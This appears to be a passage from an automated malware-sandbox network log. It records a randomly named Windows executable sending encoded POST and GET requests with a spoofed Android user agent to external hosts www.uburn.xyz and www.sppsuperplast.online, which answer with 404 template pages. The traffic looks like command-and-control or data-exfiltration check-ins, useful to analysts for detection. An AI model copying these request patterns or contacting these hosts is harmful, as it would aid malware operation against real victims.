                                                      Sep 19, 2024 15:04:54.177985907 CEST224INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 32 2d 64 61 72 6b 2e 68 74 6d 6c 22
                                                      Data Ascii: <li><a class="dropdown-item" href="header2-dark.html">Header 2 Dark</a></li> </ul> </li
                                                      Sep 19, 2024 15:04:54.178021908 CEST1236INData Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20
                                                      Data Ascii: > <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu">
                                                      Sep 19, 2024 15:04:54.183018923 CEST1236INData Raw: 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64
                                                      Data Ascii: ></li> <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      12192.168.2.224917367.223.117.189802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:04:56.147368908 CEST2472OUTPOST /unks/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate, br
                                                      Host: www.uburn.xyz
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 3625
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Origin: http://www.uburn.xyz
                                                      Referer: http://www.uburn.xyz/unks/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 30 30 79 70 3d 52 66 4a 70 31 2b 74 43 4c 63 61 6a 61 45 73 4b 4e 4d 4e 74 45 77 6a 68 2b 39 70 50 33 6c 46 59 57 61 48 47 49 7a 68 73 4f 49 51 62 4c 73 65 43 42 52 55 71 4f 4f 78 33 36 6c 61 67 2b 6b 57 58 79 67 4e 4d 68 38 6a 36 79 2f 31 31 79 78 7a 78 30 50 5a 2f 66 57 79 76 4c 39 51 4a 32 50 61 63 4e 2f 50 61 70 41 6f 51 30 4f 41 6c 65 4b 45 62 36 42 75 58 42 41 72 6d 65 44 33 6d 57 55 46 2b 4c 46 6d 2b 38 79 49 4b 52 76 4f 32 69 49 4e 4a 73 31 62 58 5a 53 67 6b 52 6b 43 30 48 6b 61 56 68 38 44 32 74 58 65 47 73 63 6d 44 6f 43 46 73 69 34 2f 2f 36 33 57 69 43 2f 57 4e 46 53 78 59 4e 45 36 32 32 37 32 4f 5a 68 47 55 6c 30 79 67 76 32 74 59 6d 6f 69 79 6a 62 4a 62 4a 45 43 76 46 44 51 69 37 39 51 59 71 4b 59 30 57 7a 6c 56 66 4d 57 4a 6b 57 4f 45 71 54 34 38 35 61 56 4c 4f 6b 45 52 4f 56 4a 42 46 39 64 47 6f 6a 32 50 7a 76 76 38 34 59 75 56 78 61 6c 6f 49 48 47 56 5a 33 7a 33 37 2b 79 70 70 4a 49 61 41 54 57 51 78 4b 47 32 32 6a 76 76 31 76 49 6b 6c 41 4a 66 4b 69 76 36 6c 6f 36 76 37 67 76 4b 7a [TRUNCATED]
                                                      Data Ascii: 00yp=RfJp1+tCLcajaEsKNMNtEwjh+9pP3lFYWaHGIzhsOIQbLseCBRUqOOx36lag+kWXygNMh8j6y/11yxzx0PZ/fWyvL9QJ2PacN/PapAoQ0OAleKEb6BuXBArmeD3mWUF+LFm+8yIKRvO2iINJs1bXZSgkRkC0HkaVh8D2tXeGscmDoCFsi4//63WiC/WNFSxYNE62272OZhGUl0ygv2tYmoiyjbJbJECvFDQi79QYqKY0WzlVfMWJkWOEqT485aVLOkEROVJBF9dGoj2Pzvv84YuVxaloIHGVZ3z37+yppJIaATWQxKG22jvv1vIklAJfKiv6lo6v7gvKzeMwG+jIYivJrTvzewZ5Muthd+bFdMVUJ5f3MEXJIgs/rg5321RCleso2N2y9h4OIfGCAIS34dBo2CSM0xQ82DqB1WTI8fFp+HGZ4BcNdd3HWEfdr2gpO7G691m2WqxClIMgtTByerc9GDkJQ8lMjHhiCEeqrOCbaSTpmxMq0S+ODRsIH1SzPWYQepeJ70VYpZ8Z5DPfUPJfTQdXB6vgcDuMXVs7cWtuKF8HD5dzkKq4GBUWKvmMDMmpRtmrZc47jOFU7zQn6CHONv+pKKSiiBtSLW/R21Ibm+49DeFrtZfZrRkD1EB7Fo0z2eSBnv2DO93VbDhzvMVtXCkhTUFNcv5XTBhIXwYNU1lyJA7DfcfIc9G7wm8AQRV0w5GyTMWIGMi26h91BgvCDahaouYe1U3Km/V50oyjXpQqftSBGBZy+PgZu1HVQwuYWlpJUp7nReaSjMnp5PLu8GsWi4DAjSSg9OHYQUQ4rNNK7NOhnygzBg4id4n28s1XynCCwQm3UorOkjyUJUeh8zlX79ZbzDsSlRU4l27oj31gyJk46yLdLTsEdwRjpyuqdLO4Rf4YC0FnyUiVpCKH2ySAwZS4S5QXBxc5fSL+n60s/QVsyO+4U3nLMUz8CQ6khGl3FmkKk3JRZko4KRdFZIGwoR3e5HzOU456OqJjBZD [TRUNCATED]
                                                      Sep 19, 2024 15:04:56.152523994 CEST1683OUTData Raw: 41 34 33 51 6f 67 65 4a 4e 76 6f 6e 53 52 52 51 38 50 46 57 4a 70 67 4b 2b 32 6f 69 2f 63 56 4b 53 4b 33 71 37 30 73 6a 39 63 53 6e 5a 65 51 50 46 69 36 47 74 75 73 51 6b 6e 44 49 41 4c 5a 47 55 63 56 6b 38 43 4d 36 42 6b 68 6c 4d 54 35 53 73 4e
                                                      Data Ascii: A43QogeJNvonSRRQ8PFWJpgK+2oi/cVKSK3q70sj9cSnZeQPFi6GtusQknDIALZGUcVk8CM6BkhlMT5SsNlqP0yGr+j9Jktv8/MwZrlELzGOwwHgOdSnvqD6L/A4tmP6xxyjwlKFETzxdu78wSOwD1e9Vt9xjvLlbKKSNwotqyPUbUU7tJH+8z3dU1sz5Jv2EZcPm6T7Db7eWw8BkFX7e6opSMmGT5xHkmuyq9SBltWU3hOSkMP
                                                      Sep 19, 2024 15:04:56.729392052 CEST1236INHTTP/1.1 404 Not Found
                                                      Date: Thu, 19 Sep 2024 13:04:56 GMT
                                                      Server: Apache
                                                      X-Frame-Options: SAMEORIGIN
                                                      Content-Length: 32106
                                                      X-XSS-Protection: 1; mode=block
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                      Sep 19, 2024 15:04:56.729415894 CEST1236INData Raw: 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63
                                                      Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL -->
                                                      Sep 19, 2024 15:04:56.729433060 CEST1236INData Raw: 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20
                                                      Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-scre
                                                      Sep 19, 2024 15:04:56.729448080 CEST1236INData Raw: 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 65 6e 67 6c 61 6e 64 2e 70 6e 67 22 20 61 6c 74 3d 22 65 6e 67 6c 61 6e 64 20 66 6c 61 67 22 20 63 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 45 6e 67 6c 69 73 68 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: custom/images/england.png" alt="england flag" class="mr-1"> English</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/images/France.png"
                                                      Sep 19, 2024 15:04:56.729463100 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 62 72 61 6e 64 20 70 6c 2d 30 22 20 68 72 65 66 3d 22 69 6e 64 65 78 2e 68 74 6d 6c 22 3e 3c 69 6d 67 20 73 72 63 3d
                                                      Data Ascii: <a class="navbar-brand pl-0" href="index.html"><img src="assets/custom/images/fables-logo.png" alt="Fables Template" class="fables-logo"></a> <button class="navbar-toggler" type="button" da
                                                      Sep 19, 2024 15:04:56.729476929 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 6f 6d 65 32 2e 68 74 6d 6c 22 3e 48 6f 6d 65 20 32 3c 2f 61 3e 3c 2f
                                                      Data Ascii: <li><a class="dropdown-item" href="home2.html">Home 2</a></li> <li><a class="dropdown-item" href="home3.html">Home 3</a></li> <li><a
                                                      Sep 19, 2024 15:04:56.729492903 CEST776INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 31 2d 74 72 61 6e 73 70 61 72 65 6e 74
                                                      Data Ascii: <li><a class="dropdown-item" href="header1-transparent.html">Header 1 Transparent</a></li> <li><a class="dropdown-item" href="header1-light.html">Header 1
                                                      Sep 19, 2024 15:04:56.729576111 CEST1236INData Raw: 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: class="dropdown-menu"> <li><a class="dropdown-item" href="header2-transparent.html">Header 2 Transparent</a></li> <li><a cl
                                                      Sep 19, 2024 15:04:56.729590893 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e
                                                      Data Ascii: </ul> </li> <li><a class="dropdown-item dropdown-toggle" href="#">Header 4</a>
                                                      Sep 19, 2024 15:04:56.729607105 CEST1016INData Raw: 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 35 2d 6c 69 67 68 74 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 35 20 4c 69 67 68 74 3c 2f 61 3e
                                                      Data Ascii: <li><a class="dropdown-item" href="header5-light.html">Header 5 Light</a></li> <li><a class="dropdown-item" href="header5-dark.html">Header 5 Dark</a></li>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      13192.168.2.224917467.223.117.189802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:04:58.857593060 CEST470OUTGET /unks/?00yp=cdhJ2J1BF/3FP1t6JaUpRBiY6vJj+H0GJvy2RzMWe/YhGvvDNzkKCLZa4X+kjjSbzwEwxp7G3rhe+yLW3Nh0WyGxOfs3vMm4SM/FmgEF/5JqIbYW5mmAES/JfVic&8Xv=VLHph HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.uburn.xyz
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Sep 19, 2024 15:04:59.430759907 CEST1236INHTTP/1.1 404 Not Found
                                                      Date: Thu, 19 Sep 2024 13:04:59 GMT
                                                      Server: Apache
                                                      X-Frame-Options: SAMEORIGIN
                                                      Content-Length: 32106
                                                      X-XSS-Protection: 1; mode=block
                                                      Connection: close
                                                      Content-Type: text/html; charset=utf-8
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                      Sep 19, 2024 15:04:59.430784941 CEST1236INData Raw: 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73
                                                      Data Ascii: strap.min.css" rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL
                                                      Sep 19, 2024 15:04:59.430799007 CEST1236INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e
                                                      Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="
                                                      Sep 19, 2024 15:04:59.430814028 CEST672INData Raw: 6d 67 20 73 72 63 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 65 6e 67 6c 61 6e 64 2e 70 6e 67 22 20 61 6c 74 3d 22 65 6e 67 6c 61 6e 64 20 66 6c 61 67 22 20 63 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 45 6e 67 6c 69 73 68
                                                      Data Ascii: mg src="assets/custom/images/england.png" alt="england flag" class="mr-1"> English</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/ima
                                                      Sep 19, 2024 15:04:59.430820942 CEST1236INData Raw: 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 74 68 69 72 64 2d 74 65 78 74 2d 63 6f 6c 6f 72 20 66 6f 6e 74 2d 31 33 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73
                                                      Data Ascii: t"> <p class="fables-third-text-color font-13"><span class="fables-iconemail"></span> Email: Design@domain.com</p> </div> </div> </div></div> ... /End Top Header -->... Start Fables N
                                                      Sep 19, 2024 15:04:59.430834055 CEST1236INData Raw: 72 2d 6e 61 76 20 6d 78 2d 61 75 74 6f 20 66 61 62 6c 65 73 2d 6e 61 76 22 3e 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69
                                                      Data Ascii: r-nav mx-auto fables-nav"> <li class="nav-item dropdown"> <a class="nav-link dropdown-toggle" href="#" id="sub-nav1" data-toggle="dropdown" aria-haspopup="true" ari
                                                      Sep 19, 2024 15:04:59.430847883 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 46 65 61 74 75 72 65 73 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: Features </a> <ul class="dropdown-menu" aria-labelledby="sub-nav2"> <li><a class="dropdown-item dropdown-togg
                                                      Sep 19, 2024 15:04:59.430888891 CEST672INData Raw: 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 20 32 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: lass="dropdown-item dropdown-toggle" href="#">Header 2</a> <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header
                                                      Sep 19, 2024 15:04:59.430903912 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d
                                                      Data Ascii: </li> <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu">
                                                      Sep 19, 2024 15:04:59.430922031 CEST1236INData Raw: 61 64 65 72 20 34 20 4c 69 67 68 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: ader 4 Light</a></li> <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul>
                                                      Sep 19, 2024 15:04:59.436007977 CEST1236INData Raw: 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 20
                                                      Data Ascii: rs</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Footer 1</a>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      14192.168.2.224917585.159.66.93802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:05:04.561189890 CEST2472OUTPOST /og3c/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate, br
                                                      Host: www.sppsuperplast.online
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 2161
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Origin: http://www.sppsuperplast.online
                                                      Referer: http://www.sppsuperplast.online/og3c/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 30 30 79 70 3d 43 4c 6b 74 34 42 6a 54 62 68 6a 71 65 61 57 6a 32 37 36 57 63 61 4d 50 58 77 65 66 43 37 7a 51 64 70 4e 4c 5a 33 76 76 2f 73 4b 39 58 4c 54 69 58 78 66 54 32 78 47 45 75 4c 47 6b 67 31 35 49 4a 66 73 52 6a 73 31 69 6f 62 46 64 37 6a 47 43 4e 34 76 4a 2b 48 43 47 66 31 78 65 6b 71 41 36 79 4d 42 43 55 54 62 39 45 4b 2f 2f 68 38 41 4f 56 36 51 6f 75 57 41 63 58 59 51 50 68 78 2f 52 58 39 51 56 45 64 41 51 61 2b 36 54 6f 6a 67 46 69 62 47 42 55 74 50 71 54 57 77 6a 7a 79 4e 48 7a 2f 4b 54 63 4e 69 79 58 33 5a 54 62 50 35 66 34 31 77 44 48 4e 43 56 4c 72 49 66 75 70 2f 33 51 48 71 44 31 6c 64 6b 4d 63 51 76 45 31 61 50 71 67 52 48 43 6d 45 79 37 76 50 2b 5a 67 64 63 62 2b 6c 36 31 32 7a 54 39 74 33 41 7a 66 39 72 41 38 78 6f 52 4e 68 55 61 4d 33 64 4a 4c 70 41 33 31 6b 39 46 42 57 4a 6e 54 2f 73 4b 4e 70 58 7a 35 39 35 54 47 64 51 38 39 49 48 5a 70 57 44 6a 31 74 39 4c 44 56 31 48 45 49 56 6e 4d 4c 49 30 48 58 2b 63 75 4c 46 71 50 67 50 4e 54 58 36 72 31 4f 77 45 68 6f 54 66 54 5a 6a 79 [TRUNCATED]
                                                      Data Ascii: 00yp=CLkt4BjTbhjqeaWj276WcaMPXwefC7zQdpNLZ3vv/sK9XLTiXxfT2xGEuLGkg15IJfsRjs1iobFd7jGCN4vJ+HCGf1xekqA6yMBCUTb9EK//h8AOV6QouWAcXYQPhx/RX9QVEdAQa+6TojgFibGBUtPqTWwjzyNHz/KTcNiyX3ZTbP5f41wDHNCVLrIfup/3QHqD1ldkMcQvE1aPqgRHCmEy7vP+Zgdcb+l612zT9t3Azf9rA8xoRNhUaM3dJLpA31k9FBWJnT/sKNpXz595TGdQ89IHZpWDj1t9LDV1HEIVnMLI0HX+cuLFqPgPNTX6r1OwEhoTfTZjyhxI1ZHB3XD0ML2hGETeVDDO0Oc4+tyg2ghIFVklXJ6HIttsvhRu1bVSR7pmmLdNbrfMKo4yhZg7iGNplB2ZAjetLUEJZV80rAPkP53DkBGFDNTTcpIa3s/ubQzjoixeSNDex2Pv7f1GR4+T+soUPykNeEJL4msI8INA7z9c2H0LfgYOx0APwxmY5fi9Lav07B0dmpqsFuhCISvVvLp+0wGzSKU+rtkQv9IeDKsfHUfp/V1snf+XuFHkmgLBno/ezG3dZDJtPSs6OEHOQMfiPaEQNzfBIdixrF09j36i9H54xH7Yv1GdmKTpvSCcJaPNLwbzOjqJlMsxwvQ58DOpRU0nGzIhXAK/jdfI1AX/gAQtD/6DUkBwWml3gMn7GSHyjKWck0Xfv+ffTUU2I7htOO0+oTIS0dBbWQJab9B5azRyAzwgVcEIj70QIPD+3LagLaJy3k3qDb4PFwVkk+Zl3HJ005WcnV2+wJwFGVJtfx85xG+oFCEhF+W4dYIJ5jfTNlq8elH3IzxPnUpp2TYNTGzbYJZAVpsl0h2/ZlLr9yvN1QfXGdAI3yiXqIFLRVgJwH0ssQj0h40tmrYBCgbsVBAAxbqZkQ3fWCQssm/Sn5uWSltk9R8IrlY+bIU/SXXnbOwcb8sV/P5je7YcPTGBKJKh9+Ok4MsZv0e [TRUNCATED]
